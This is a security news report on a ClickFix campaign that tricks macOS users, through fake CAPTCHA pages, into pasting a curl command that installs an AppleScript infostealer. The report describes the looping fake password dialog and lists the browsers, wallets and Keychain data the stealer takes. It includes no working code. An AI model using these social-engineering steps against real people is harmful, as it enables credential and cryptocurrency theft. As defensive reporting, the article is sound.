A sophisticated ClickFix campaign targets macOS users with AppleScript-based infostealers that harvest credentials, cryptocurrency wallets, and browser data through deceptive CAPTCHA prompts.
A new ClickFix campaign targeting macOS users delivers an AppleScript-based infostealer that collects credentials and live session cookies from 14 browsers, 16 cryptocurrency wallets, and more than 200 extensions. The attack represents a significant evolution in social engineering tactics that have traditionally focused on Windows systems.
How the Attack Works
The campaign begins when victims encounter a fake CAPTCHA page while browsing. Upon detecting a desktop environment, the malware performs additional inspection to determine the specific desktop OS before checking for macOS-specific strings within the user-agent. This allows the attackers to load the AppleScript-based stealer specifically designed for Apple systems.
Once the fake CAPTCHA is displayed, users are prompted to open Spotlight on their Mac and paste a "verification code" into the search feature. The phony code is actually a curl command that, when executed, silently downloads a malicious script from an attacker-controlled server. This script collects the victim's username, hardcodes the command-and-control (C2) server address, and creates a temporary directory at /tmp/xdivcmp/ to stage all stolen data before transmission.
The Credential Harvesting Phase
The malware employs particularly deceptive tactics during the credential-harvesting stage. It deploys a social engineering dialog box that loads the authentic macOS system lock icon from local resources, making it appear as a legitimate Apple dialog box. Users see the lock, think it's a legitimate Apple dialog box, and then enter their system password.
The malware takes extreme measures to force credential entry. The dialog box only has a single action button - there's no option for users to close the window - and it keeps reappearing until the victim enters a valid password. User passwords are validated in real time using macOS's directory services authentication, and if incorrect, the dialog box reappears in a continuous loop until the person provides the correct password.
Data Theft Scope
Once credentials are obtained, the stealer goes after extensive user data:
Browser Data:
- 12 Chromium-based browsers: Chrome, Brave, Edge, Vivaldi, Opera, Opera GX, Chrome Beta, Chrome Canary, Chromium, Chrome Dev, Arc, and CocCoc
- Firefox and Waterfox (Firefox-based browser)
- Session tokens, authentication cookies, saved passwords, and autofill information including credit card numbers
- Data from more than 200 browser extensions
Cryptocurrency Wallets:
- 16 standalone desktop applications: Exodus, Atomic, Electrum, Coinomi, Guarda, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, Dash Core, Dogecoin Core, Monero, Wasabi, Sparrow, Electron Cash, and Electrum-LTC
- Browser extension wallets including MetaMask, Phantom, Coinbase Wallet, Trust Wallet, and dozens of blockchain-specific extensions
Other Targeted Data:
- macOS Keychain (stores saved passwords, Wi-Fi credentials, secure notes, and cryptographic keys)
- Password manager credentials from LastPass, 1Password, Dashlane, Bitwarden
- Two-factor authentication apps including Authy and Google Authenticator extensions
- Various VPN and single sign-on extensions used for corporate access
Geographic and Sector Targeting
According to Netskope Threat Labs researcher Jan Michael Alcantara, victims are primarily located in Asia and work in the finance sector. The researchers don't know who is behind this particular campaign, though they note the malware can infect both Windows and macOS machines by using client-side JavaScript to filter victims by user-agent, ignoring mobile devices and directing desktop users to either Windows or macOS-specific payloads.
Protection Measures
Apple did not respond to inquiries about this campaign, but the latest versions of macOS Tahoe (26.4) or macOS Sequoia include a new feature designed to block ClickFix attacks. This feature alerts users when they attempt to paste potentially malicious commands into the Terminal application. Updating to these versions can help detect and prevent these types of attacks.
However, if users are running older OS versions or ignore the macOS warning and click the "paste anyway" option, the malware proceeds with its attack. This highlights the importance of both keeping systems updated and maintaining vigilance against social engineering tactics.
Technical Analysis and Indicators
Netskope has published a full list of indicators of compromise and scripts related to this malware in its GitHub repository. The campaign serves as a reminder that social engineering remains a primary threat to both Windows and macOS users, despite advances in technical security measures.
This infostealer campaign is unrelated to another macOS-targeting campaign that Microsoft last week attributed to North Korean criminals, despite similar techniques such as using social engineering even when malware is running.
The sophistication of this attack demonstrates how cybercriminals continue to evolve their tactics, combining technical exploits with psychological manipulation to bypass security measures and harvest valuable credentials and cryptocurrency assets from unsuspecting users.
Comments
Please log in or register to join the discussion